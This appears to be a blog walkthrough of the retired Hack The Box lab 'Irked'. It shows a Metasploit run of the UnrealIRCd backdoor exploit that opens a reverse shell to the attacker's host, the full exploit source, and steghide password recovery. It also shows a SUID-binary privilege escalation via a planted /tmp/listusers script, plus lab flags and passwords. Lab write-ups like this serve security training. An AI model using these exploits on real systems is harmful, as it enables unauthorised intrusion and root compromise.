HTB – Irked

Today we are going to solve another CTF challenge “irked”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of irked is 10.10.10.117

Scanning

Let’s start off with our basic Nmap command to find out the open ports and services.

root@kali:~/htb# nmap -p- -sV 10.10.10.117 --open
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-04 05:49 EDT
Nmap scan report for 10.10.10.117
Host is up (0.027s latency).
Not shown: 65427 closed ports, 101 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
34772/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.89 seconds

Enumeration

I tried to extract hidden information with the help of steghide, but we need to find the passphrase for that.

root@kali:~/htb# steghide extract -sf irked.jpg
Enter passphrase:

Exploiting

Fortunately, I found an exploit for unrealircd in Metasploit, although the default port for ircd is 6667, it runs on 6697 here. I pwned the victim machine successfully after running the module.

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
rhosts => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 10.10.14.5:4444 
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo jt9flkHuSYLifEoc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "jt9flkHuSYLifEoc\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.5:4444 -> 10.10.10.117:34526) at 2019-09-04 05:07:52 -0400

python -c 'import pty;pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$ cd /home
cd /home
ircd@irked:/home$ 
ircd@irked:/home$ ls
ls
djmardov ircd
ircd@irked:/home$ 
ircd@irked:/home$ cd djmardov/Documents
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 2018 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
-rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
ircd@irked:/home/djmardov/Documents$ 
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
root@kali:~/htb# curl http://10.10.10.117
<img src=irked.jpg>
<br>
<b><center>IRC is almost working!</b></center>
root@kali:~/htb# curl http://10.10.10.117/irked.jpg -o irked.jpg
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 34697 100 34697 0 0 491k 0 --:--:-- --:--:-- --:--:-- 491k
root@kali:~/htb# steghide extract -sf irked.jpg
Enter passphrase: UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
root@kali:~/htb# cat pass.txt
Kab6h+m+bbp2J:HG
I found another password from the inside pass.txt file “Kab6h+m+bbp2J: HG.”
Without Metasploit:

nmap also gave me the name of the irc server, UnrealIRCd. searchsploit shows there are exploits if the version is 3.2.8.1:

root@kali:~/htb# searchsploit UnrealIRCd
---------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~/htb# searchsploit -m exploits/linux/remote/16922.rb
Exploit: UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/16922/
Path: /usr/share/exploitdb/exploits/linux/remote/16922.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /root/htb/16922.rb

root@kali:~/htb# cat 16922.rb 
##
# $Id: unreal_ircd_3281_backdoor.rb 11227 2010-12-05 15:08:22Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
			'Description'    => %q{
					This module exploits a malicious backdoor that was added to the
				Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
				Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11227 $',
			'References'     =>
				[
					[ 'CVE', '2010-2075' ],
					[ 'OSVDB', '65445' ],
					[ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ]
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jun 12 2010'))

		register_options(
			[
				Opt::RPORT(6667)
			], self.class)
	end

	def exploit
		connect

		print_status("Connected to #{rhost}:#{rport}...")
		banner = sock.get_once(-1, 30)
		banner.to_s.split("\n").each do |line|
			print_line("    #{line}")
		end

		print_status("Sending backdoor command...")
		sock.put("AB;" + payload.encoded + "\n")

		handler
		disconnect
	end
endroot@kali:~/htb#

It looks like the exploit is to connect and then send “AB;” + the payload + “\n”.

Privilege Escalation

First, I open the user.txt file and finish the first challenge. Now let’s penetrate more to find the root.txt file, and that’s why we need to increase the privilege, so I’m trying to find out if there’s any suid permission script.Here /usr/bin/viewuser looks more interesting, let’s check it out.

root@kali:~/htb# ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password: Kab6h+m+bbp2J:HG

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep  4 05:13:43 2019 from 10.10.14.5
djmardov@irked:~$ pwd
/home/djmardov
djmardov@irked:~$ cat Documents/user.txt 
4a66a78b12dc0e661a59d3f5c0267a8e
djmardov@irked:/$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
djmardov@irked:/$ ls -la /usr/bin/viewuser
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
djmardov@irked:/$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-09-04 05:05 (:0)
djmardov pts/1 2019-09-04 05:13 (10.10.14.5)
sh: 1: /tmp/listusers: not found
djmardov@irked:/$ echo '/bin/sh' > /tmp/listusers
djmardov@irked:/$ chmod 777 /tmp/listusers
djmardov@irked:/$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-09-04 05:05 (:0)
djmardov pts/1 2019-09-04 05:13 (10.10.14.5)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
# cd /root
# ls
pass.txt root.txt
# cat root.txt
8d8*****af3

So, when I run the program, I found that this application was being developed to set test user permissions but couldn’t find listusers file within /tmp. This program is, therefore, searching for data from the listusers file and the file is missing from the directory inside /tmp.

So what we can do is write a script to call bin / sh and save it as listusers inside /tmp and then run the viewuser to run it.

Now we have a root shell

Credits to hackingarticles.in

Author: Jacco Straathof

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *